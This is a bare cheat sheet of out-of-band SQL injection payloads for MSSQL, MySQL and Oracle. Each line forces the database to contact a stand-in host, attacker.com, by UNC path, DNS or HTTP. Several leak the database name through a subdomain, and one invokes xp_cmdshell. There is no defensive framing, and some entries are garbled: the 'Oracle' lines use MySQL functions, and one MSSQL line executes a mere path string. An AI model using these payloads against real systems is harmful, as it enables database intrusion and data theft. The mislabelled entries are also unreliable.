# Out-of-Band SQLi Payloads

# MSSQL OOB
'; exec master..xp_dirtree '\\\\attacker.com\\share'--
'; exec master..xp_fileexist '\\\\attacker.com\\test'--
'; DECLARE @q varchar(8000); SET @q='\\attacker.com\\share'; EXEC(@q);--
'; EXEC('xp_cmdshell ''ping attacker.com''')--

# MySQL OOB
' UNION SELECT 1, LOAD_FILE('\\\\attacker.com\\share')--
' AND (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT DATABASE()), '.attacker.com\\log')))--
' UNION SELECT NULL,NULL INTO OUTFILE '\\\\attacker.com\\file'--
' UNION SELECT 1 INTO OUTFILE '\\\\attacker.com\\share'--

# Oracle OOB
' AND UTL_INADDR.GET_HOST_ADDRESS('attacker.com')--
' AND UTL_HTTP.REQUEST('http://attacker.com/log')--
' AND (SELECT EXTRACTVALUE(NULL, CONCAT(0x5c5c, (SELECT DATABASE()), '.attacker.com\\log')))--
' AND (SELECT NULL FROM dual WHERE 1=LOAD_FILE('\\\\attacker.com\\share'))--